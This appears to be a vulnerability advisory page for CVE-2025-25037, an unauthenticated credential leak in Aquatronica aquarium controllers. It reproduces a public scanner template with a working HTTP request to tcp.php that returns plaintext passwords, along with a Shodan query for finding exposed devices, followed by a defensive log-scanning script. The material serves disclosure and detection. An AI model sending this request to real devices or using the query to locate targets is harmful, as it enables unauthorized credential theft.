CVE-2025-25037: Aquatronica Controller System <= 5.1.6 - Information Disclosure

Date: 2025-08-01 | Affected software: Aquatronica Controller System | PoC: public

Vulnerability description

Aquatronica Controller System firmware 5.1.6 and earlier, and web interface 2.0 and earlier, contain an information disclosure vulnerability: the tcp.php endpoint can be accessed without authentication, which lets remote attackers retrieve sensitive configuration data, including plaintext credentials. Exploitation requires no authentication.

PoC code [public]

id: CVE-2025-25037

info:
  name: Aquatronica Controller System <= 5.1.6 - Information Disclosure
  author: s4e-io
  severity: high
  description: |
    Aquatronica Controller System firmware 5.1.6 and earlier and web interface 2.0 and earlier contain an information disclosure vulnerability caused by unauthenticated access to tcp.php endpoint, letting remote attackers retrieve sensitive configuration data including plaintext credentials, exploit requires no authentication.
  impact: |
    Unauthenticated attackers can retrieve sensitive configuration data including plaintext credentials through the tcp.php endpoint, potentially gaining full administrative access to the controller system.
  remediation: |
    Upgrade to Aquatronica Controller System firmware version 5.1.7 or later and web interface version 2.1 or later that implements proper authentication controls.
  reference:
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5824.php
    - https://www.exploit-db.com/exploits/52028
    - https://vulncheck.com/advisories/aquatronica-controller-system-credential-leak
    - https://nvd.nist.gov/vuln/detail/CVE-2025-25037
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:H/SA:H
    cve-id: CVE-2025-25037
    cwe-id: CWE-200
    epss-score: 0.01334
    epss-percentile: 0.79538
  metadata:
    verified: true
    max-request: 1
    vendor: aquatronica
    product: controller
    shodan-query: html:"aquatronica"
  tags: cve,cve2025,aquatronica,info-leak,vkev,vuln

http:
  - raw:
      - |
        POST /tcp.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        function_id=tcp_xml_request&command=WS_GET_NETWORK_CFG

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "WEB_PASSWORD"
          - "pwd=&quot;"
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100d3e6f93be665382de48453504a575ce03d1962406c66e3f82596610fefd655ed022100ed67db8008591b9b266eda7cbc44e07109d9cfc5374318dd08793b0c904c3217:922c64590222798bb761d5b6d8e72950
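
A defender-side check for the request the template above sends, as an added example that is not part of the original page or the template author's code: it scans a reverse-proxy log for POSTs to /tcp.php carrying command=WS_GET_NETWORK_CFG from outside a management network. The JSON-lines log format, its field names, MGMT_NETS and the sample lines are assumptions constructed for illustration.

```python
import ipaddress
import json
from urllib.parse import parse_qs, urlsplit

# Assumption: networks allowed to manage the controller (constructed value).
MGMT_NETS = [ipaddress.ip_network("10.20.0.0/24")]

# Constructed JSON-lines proxy log; the field names are hypothetical.
SAMPLE_LOG = """\
{"src": "10.20.0.15", "method": "POST", "path": "/tcp.php", "status": 200, "body": "function_id=tcp_xml_request&command=WS_GET_NETWORK_CFG"}
{"src": "203.0.113.7", "method": "POST", "path": "/tcp.php", "status": 200, "body": "function_id=tcp_xml_request&command=WS_GET_NETWORK_CFG"}
{"src": "203.0.113.7", "method": "GET", "path": "/index.php", "status": 200, "body": ""}
{"src": "198.51.100.9", "method": "POST", "path": "/tcp.php?x=1", "status": 200, "body": "command=WS_GET_NETWORK_CFG&function_id=tcp_xml_request"}
{"src": "198.51.100.9", "method": "POST", "path": "/tcp.php", "status": 403, "body": "function_id=tcp_xml_request&command=WS_GET_NETWORK_CFG"}
not-json garbage line
"""

def is_mgmt(src):
    """True when the source address belongs to an allowed management network."""
    addr = ipaddress.ip_address(src)
    return any(addr in net for net in MGMT_NETS)

def find_tcp_php_access(log_text):
    """Return (src, verdict) for each network-config request to tcp.php
    that came from outside MGMT_NETS."""
    hits = []
    for line in log_text.splitlines():
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed lines instead of aborting the scan
        if not isinstance(rec, dict) or rec.get("method") != "POST":
            continue
        # Compare the path component only, so a query string does not hide the hit.
        if urlsplit(rec.get("path", "")).path != "/tcp.php":
            continue
        # Parse the form body so parameter order does not matter.
        params = parse_qs(rec.get("body", ""))
        if "WS_GET_NETWORK_CFG" not in params.get("command", []):
            continue
        if is_mgmt(rec["src"]):
            continue
        verdict = "config-returned" if rec.get("status") == 200 else "blocked-or-failed"
        hits.append((rec["src"], verdict))
    return hits

if __name__ == "__main__":
    for src, verdict in find_tcp_php_access(SAMPLE_LOG):
        print(f"{src}: {verdict}")
```

A "config-returned" hit on a device running firmware 5.1.6 or earlier means the credentials in that response should be treated as exposed and rotated after upgrading.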
